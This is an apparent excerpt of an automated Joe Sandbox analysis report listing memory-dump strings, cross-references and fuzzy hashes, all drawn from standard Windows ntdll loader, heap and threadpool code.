• String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
• API String ID: 0-1245972979
Strings
• ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 017B1028
• ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 017B106B
• ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017B10AE
• ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 017B0FE5
Similarity
• API ID:
• String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
• API String ID: 0-1468400865
Strings
• LdrpDynamicShimModule, xrefs: 017BA998
• minkernel\ntdll\ldrinit.c, xrefs: 017BA9A2
• Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 017BA992
• apphelp.dll, xrefs: 01772462
Similarity
• API ID:
• String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
• API String ID: 0-176724104
Strings
• HEAP: , xrefs: 01763264
• HEAP[%wZ]: , xrefs: 01763255
• Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0176327D
Similarity
• API ID:
• String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
• API String ID: 0-617086771
Strings
Similarity
• API ID:
• String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
• API String ID: 0-4253913091
Strings
Similarity
• API ID: InitializeThunk
• String ID: $@
• API String ID: 2994545307-1077428164
Strings
Similarity
• API ID:
• String ID: FilterFullPath$UseFilter$\??\
• API String ID: 0-2779062949
Strings
• minkernel\ntdll\ldrinit.c, xrefs: 017BA121
• LdrpCheckModule, xrefs: 017BA117
• Failed to allocated memory for shimmed module list, xrefs: 017BA10F
Similarity
• API ID:
• String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
• API String ID: 0-161242083
Strings
Similarity
• API ID:
• String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
• API String ID: 0-1334570610
Strings
• minkernel\ntdll\ldrinit.c, xrefs: 017C82E8
• LdrpInitializePerUserWindowsDirectory, xrefs: 017C82DE
• Failed to reallocate the system dirs string !, xrefs: 017C82D7
Similarity
• API ID:
• String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
• API String ID: 0-1783798831
Strings
• PreferredUILanguages, xrefs: 0180C212
• @, xrefs: 0180C1F1
• \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0180C1C5
Similarity
• API ID:
• String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
• API String ID: 0-2968386058
                                                                                                                                            • Opcode ID: 3d8fc158da1aef01b5f2d5fa4b6c18edf3e33b29a868e963f8a7d14e79ec8624
                                                                                                                                            • Instruction ID: 3a006d2a5b8d41fb0e153380691e0f2798fc08137c26f4886728c72b7b1e91bd
                                                                                                                                            • Opcode Fuzzy Hash: 3d8fc158da1aef01b5f2d5fa4b6c18edf3e33b29a868e963f8a7d14e79ec8624
                                                                                                                                            • Instruction Fuzzy Hash: C6417171A0021DEBDF52DED8CC95BEEFBB8AB14704F1041AAEA09E7684D7749B44CB50
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                            • API String ID: 0-1373925480
                                                                                                                                            • Opcode ID: 04a86124fa8f3d022a67c676528c8a76e88801bd4fe44fa794ee4e5c3b5306b3
                                                                                                                                            • Instruction ID: 120e05d63965fa20ca1e0aa91d4ff347c0b68a817be014ebaa0b1365596bfce4
                                                                                                                                            • Opcode Fuzzy Hash: 04a86124fa8f3d022a67c676528c8a76e88801bd4fe44fa794ee4e5c3b5306b3
                                                                                                                                            • Instruction Fuzzy Hash: 0941F372A046588BEB26DBE8C84CBADFBF8FF59340F140459DA02EB795D7349901CB10
                                                                                                                                            Strings
                                                                                                                                            • LdrpCheckRedirection, xrefs: 017D488F
                                                                                                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 017D4888
                                                                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 017D4899
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                            • API String ID: 0-3154609507
                                                                                                                                            • Opcode ID: 4b3c77fa9bf45f34b99415b134ebaf55ff680a74ab470b12430e6921c588c66f
                                                                                                                                            • Instruction ID: 4e49eabc6f8c13afa29fca82e51db003b30ac91dab66606f225e99ea4d5882b8
                                                                                                                                            • Opcode Fuzzy Hash: 4b3c77fa9bf45f34b99415b134ebaf55ff680a74ab470b12430e6921c588c66f
                                                                                                                                            • Instruction Fuzzy Hash: 9E41D432A447599FCB21CE5CD941A26FBF5AF496A0F06066DED8AD7B11D730D800CB91
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                            • API String ID: 0-2558761708
                                                                                                                                            • Opcode ID: a746f90d801d9cea070a15365f998a96233f7238b6ce5fe8b19e31b665c649c2
                                                                                                                                            • Instruction ID: e4e17b98e499550d7238a8978af52202dc552097df6439ebb88bdc11a6df4958
                                                                                                                                            • Opcode Fuzzy Hash: a746f90d801d9cea070a15365f998a96233f7238b6ce5fe8b19e31b665c649c2
                                                                                                                                            • Instruction Fuzzy Hash: EF110371315102DFDB29DB28C895FBAF3A8EF40616F188169F80ACB295DB38DC41C750
                                                                                                                                            Strings
                                                                                                                                            • LdrpInitializationFailure, xrefs: 017D20FA
                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 017D2104
                                                                                                                                            • Process initialization failed with status 0x%08lx, xrefs: 017D20F3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                            • API String ID: 0-2986994758
                                                                                                                                            • Opcode ID: 953387b384f0414150573409786fa7976270e81d847ef66c300e2f9af57d935c
                                                                                                                                            • Instruction ID: c3ddb548e6fb1f7ec65e4dffc23d81a1736482fd8da732dee828b5824f464957
                                                                                                                                            • Opcode Fuzzy Hash: 953387b384f0414150573409786fa7976270e81d847ef66c300e2f9af57d935c
                                                                                                                                            • Instruction Fuzzy Hash: 96F0C8B5780318ABE724D65DDC56F99BB78EB40B54F100069FA4067286D9B0A601CA51
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                            • String ID: #%u
                                                                                                                                            • API String ID: 48624451-232158463
                                                                                                                                            • Opcode ID: 60160c17215e575406b80695e04ebeb2ccd0818ffd49a51ea5db861920fe9944
                                                                                                                                            • Instruction ID: dea26185b5106cda07f732e512e4560d14d12e06e6589e5ca616c12a2b7f8c6a
                                                                                                                                            • Opcode Fuzzy Hash: 60160c17215e575406b80695e04ebeb2ccd0818ffd49a51ea5db861920fe9944
                                                                                                                                            • Instruction Fuzzy Hash: 52716971A0010A9FDB11DFA8C994FAEBBF8FF18744F144065EA06A7256EB34ED45CB60
                                                                                                                                            Strings
                                                                                                                                            • LdrResSearchResource Exit, xrefs: 0175AA25
                                                                                                                                            • LdrResSearchResource Enter, xrefs: 0175AA13
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                            • API String ID: 0-4066393604
                                                                                                                                            • Opcode ID: 4737c614be0a944e7fdead352b7a4ba7ee5b5a7572d6bd88b10be60a22f3917f
                                                                                                                                            • Instruction ID: 8789165b2188dc8df454ee77c157165863186471e3352097ddb60cf8be801491
                                                                                                                                            • Opcode Fuzzy Hash: 4737c614be0a944e7fdead352b7a4ba7ee5b5a7572d6bd88b10be60a22f3917f
                                                                                                                                            • Instruction Fuzzy Hash: A2E18271A012199FEF62CE99C984BEEFBBABF18310F104679ED01E7251D7B49941CB50
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: `$`
                                                                                                                                            • API String ID: 0-197956300
                                                                                                                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                            • Instruction ID: 49d1fcbe331b994ba0243417fd192fcef81576e94ba64008442cab221f0cea1a
                                                                                                                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                            • Instruction Fuzzy Hash: B1C1E3322053829BE729CF28C845B6BBBE9AFC4318F044E2DF696C7299D775D605CB41
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID: Legacy$UEFI
                                                                                                                                            • API String ID: 2994545307-634100481
                                                                                                                                            • Opcode ID: 089d8f368e0ff73bdebe97b75470f71b1cf95d1119f3c6e58d07757830ab3b00
                                                                                                                                            • Instruction ID: 12318a8fcccea9985f9379099bc6e606416aca798d98de8d8f5968b78fdaa3de
                                                                                                                                            • Opcode Fuzzy Hash: 089d8f368e0ff73bdebe97b75470f71b1cf95d1119f3c6e58d07757830ab3b00
                                                                                                                                            • Instruction Fuzzy Hash: 08614A71E403199FDB14DFA88844BAEFBF9FB48B00F54406DE649EB251DB31A940CB50
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @$MUI
                                                                                                                                            • API String ID: 0-17815947
                                                                                                                                            • Opcode ID: 97421074a4fef9c2b27b80933809476847a66f2c33662c73dc7b3697c09bc10b
                                                                                                                                            • Instruction ID: fcf70f95a52c1d577375ee5908a199a54e5d559e0a92941f96f3ccccadc0bfc2
                                                                                                                                            • Opcode Fuzzy Hash: 97421074a4fef9c2b27b80933809476847a66f2c33662c73dc7b3697c09bc10b
                                                                                                                                            • Instruction Fuzzy Hash: 45510771E0021DAFDF11EFA9CC84AEFFBB9AB44754F100529EA11B7294D6309A45CBA0
                                                                                                                                            Strings
                                                                                                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0175063D
                                                                                                                                            • kLsE, xrefs: 01750540
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                            • API String ID: 0-2547482624
                                                                                                                                            • Opcode ID: 60ac7e9e3815c741be3ad8053f352064e3d712c2a738b65eb539a6cb249a677a
                                                                                                                                            • Instruction ID: a7cd9a06af012f20c46bac9fac84fc409f0223d747a4a53b09eed199d6258f33
                                                                                                                                            • Opcode Fuzzy Hash: 60ac7e9e3815c741be3ad8053f352064e3d712c2a738b65eb539a6cb249a677a
                                                                                                                                            • Instruction Fuzzy Hash: 5F519DB15047428FD765DF68C544AA7FBE4EF84304F20483EFAAA87241E7B4D546CBA2
                                                                                                                                            Strings
                                                                                                                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 0175A2FB
                                                                                                                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 0175A309
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 9b2ca3e2490f2a11e31aa424c6e7208417d05d19f6737e112ed311761b5ff74b
                                                                                                                                            • Instruction ID: e15237490dcb31ff1dc004610c21ca3c23a367b4510a8b00b27b0b7efe292806
                                                                                                                                            • Opcode Fuzzy Hash: 9b2ca3e2490f2a11e31aa424c6e7208417d05d19f6737e112ed311761b5ff74b
                                                                                                                                            • Instruction Fuzzy Hash: 3D22BA742046618AEB25CF2DC094773FBF1AF44340F18849EEB9A8B386E735E552DB61
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a303d88d166f204543dcd2e48bdaaa5de4481c3065337d6ff9843fe36c7cca94
                                                                                                                                            • Instruction ID: 5282c010049ad85e20efbbd5fb7c715899a60f4c1064a796b60a8dbf2622b596
                                                                                                                                            • Opcode Fuzzy Hash: a303d88d166f204543dcd2e48bdaaa5de4481c3065337d6ff9843fe36c7cca94
                                                                                                                                            • Instruction Fuzzy Hash: B332CD71A01205CFDB65CF68D490BAAFBF1FF48300F6485A9E956AB391DB74E841CB90
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                            • Instruction ID: 4b879487b5e09dd179e3c07192554493a3f943c0c70f5482473e851aa7ca94d3
                                                                                                                                            • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                            • Instruction Fuzzy Hash: 84F17E70E0020A9BDF15CFA9C994BAEFBF5AF48310F048169EA46AB354E774DC41CB60
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c070729cb87d4d49ba0f5b867f2b2281f6d0fd15d98800639731eab3c8386fdb
                                                                                                                                            • Instruction ID: ac4811028b6681789ab975d7e49727f71a611e26c111fbbe94b9353315aaea0d
                                                                                                                                            • Opcode Fuzzy Hash: c070729cb87d4d49ba0f5b867f2b2281f6d0fd15d98800639731eab3c8386fdb
                                                                                                                                            • Instruction Fuzzy Hash: 63D1EE71E0060A8BDF15CF68C845ABEFBF1AF8C314F1881AAD955E7241E735EA05CB61
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b0f9d3ee5fdf3aa763ee3e015d9d17de15d5c3fd678f1553bd688ebefbbbaab0
                                                                                                                                            • Instruction ID: c06fc1a0f6207be6d571de02be73ed2b1d3cffcdcff95f1f0a3beeb87ad9fae4
                                                                                                                                            • Opcode Fuzzy Hash: b0f9d3ee5fdf3aa763ee3e015d9d17de15d5c3fd678f1553bd688ebefbbbaab0
                                                                                                                                            • Instruction Fuzzy Hash: 41E179716083428FC755CF28C090A6AFBE0FF89314F558A6DF99987352EB71E905CB92
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 5e9b960afa47b0250b6b3097d49c551d42bc041f76f2a0bf286f33983cedd360
                                                                                                                                            • Instruction ID: 5acdeb9125f05e6c9a0d94253ab4dd2162cbc83c7d88fe575aedd60ac58b6393
                                                                                                                                            • Opcode Fuzzy Hash: 5e9b960afa47b0250b6b3097d49c551d42bc041f76f2a0bf286f33983cedd360
                                                                                                                                            • Instruction Fuzzy Hash: F1D11471A0020ADBDB15DFA8C890ABEF7F5BF94304F15826DE916DB281EB34E950CB51
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                            • Instruction ID: 7660c8792a891f554f02e30e71841370a544727e70de5d4de36c3261ced6803c
                                                                                                                                            • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                            • Instruction Fuzzy Hash: 02B19E75A00609AFDF24DFA8C944BABFBB9BF84314F14846DEA0297794DA34E905CB11
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                            • Instruction ID: 045c20171f83d7ef852e8e8385f2f6b16cfdd08cda79a2f905c8f5b5b3b8be43
                                                                                                                                            • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                            • Instruction Fuzzy Hash: AEB1E731600646AFDB25DB68C894BBEFBFAAF44300F284599EA56D7286D730ED41CB50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d74bd42cd57033c641566f17bbdd77ebdba8541b048a7e826dcf381a50157ec9
                                                                                                                                            • Instruction ID: 5ca783760289503930e8014c700c458232d503e41912d9f1bdc454414a3576d2
                                                                                                                                            • Opcode Fuzzy Hash: d74bd42cd57033c641566f17bbdd77ebdba8541b048a7e826dcf381a50157ec9
                                                                                                                                            • Instruction Fuzzy Hash: 63C159742083418FE764CF19C494BABFBE4BF88308F54496DE98987291D7B4E949CF92
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 003eac359f4a0524349fc8111eb865b6699ca08ba403f6929192213a7ce31e34
                                                                                                                                            • Instruction ID: 1c53a50c7e1c8c2d7552b921b416cb5be6a4650f114f526fffd4c0216da53a56
                                                                                                                                            • Opcode Fuzzy Hash: 003eac359f4a0524349fc8111eb865b6699ca08ba403f6929192213a7ce31e34
                                                                                                                                            • Instruction Fuzzy Hash: F7B17170A002668BDB75DF68C880BADF7B5EF84700F1485EAD50AE7295EB309D85CB61
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6ddfe67856fbfbd9e414477f8ba2223eb7ddec45733623e71e9fec32af496a87
                                                                                                                                            • Instruction ID: b88bd5408bd2d8f86d5f091951dab06fd50bc0c925e4a39bdc554649e771fa17
                                                                                                                                            • Opcode Fuzzy Hash: 6ddfe67856fbfbd9e414477f8ba2223eb7ddec45733623e71e9fec32af496a87
                                                                                                                                            • Instruction Fuzzy Hash: A2A1E731E006559FEF21DB68CC88FEEFBB4AB01B54F1501A5EA11AB291DB749D40CBD1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6eefee1b0dac8b30210c225f46bbf640a67bd7cee1f1eba8b58ab03122387515
                                                                                                                                            • Instruction ID: b15591ebadd0357eb4f7a2082879e6c16af3fe94b949d384d0b9347d462fd5c2
                                                                                                                                            • Opcode Fuzzy Hash: 6eefee1b0dac8b30210c225f46bbf640a67bd7cee1f1eba8b58ab03122387515
                                                                                                                                            • Instruction Fuzzy Hash: 22A1D070B10616DBDF65CF69D890BAAF7B9FF54718F10402DEA05A7291EB34E819CB80
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 030408e1e38d379637a1cace41224d279dcca20dac970955c368d33b1cc773e9
• Instruction ID: 02dd240c4a2b489623c2b12cbac6c48bc9e2e2057eaba1a5d5e525261e229b4b
• Opcode Fuzzy Hash: 030408e1e38d379637a1cace41224d279dcca20dac970955c368d33b1cc773e9
• Instruction Fuzzy Hash: 67A1F072610622DFD722DF18C984B1ABBE9FF48708F110528F989DB655D774EE80CBA1
Memory Dump Source
• Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            • Instruction Fuzzy Hash: FE516971240A05AFCB22EF69C984E6AF3BDFB14744F40086DEA5997665EB34E940CB60
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a94ea9567f8ecc17fc25d6dc8ef306ed5d4121ba099989720cf5dc0b1c90fa52
                                                                                                                                            • Instruction ID: c80d9b6a2d8ca438579f558a3b7cb1b97ece9a72c87b423298a0d21afb265604
                                                                                                                                            • Opcode Fuzzy Hash: a94ea9567f8ecc17fc25d6dc8ef306ed5d4121ba099989720cf5dc0b1c90fa52
                                                                                                                                            • Instruction Fuzzy Hash: 0C5112716083429FD754DF29D880A6BFBE5FFC8218F44492DF69AD7350EA30DA058B52
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1787974045.0000000001720000.00000040.00001000.00020000.00000000.sdmp, Offset: 01720000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_1720000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                            • Instruction ID: a52498bb94a3ba849c19834f7075fed5ae8851707444fd0b2b910c7f99f0499a
                                                                                                                                            • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                            • Instruction Fuzzy Hash: F5519F71E0021AABDF15DF98C484BEEFBB9AF49754F144069EA02AB240D734DE44CBE0
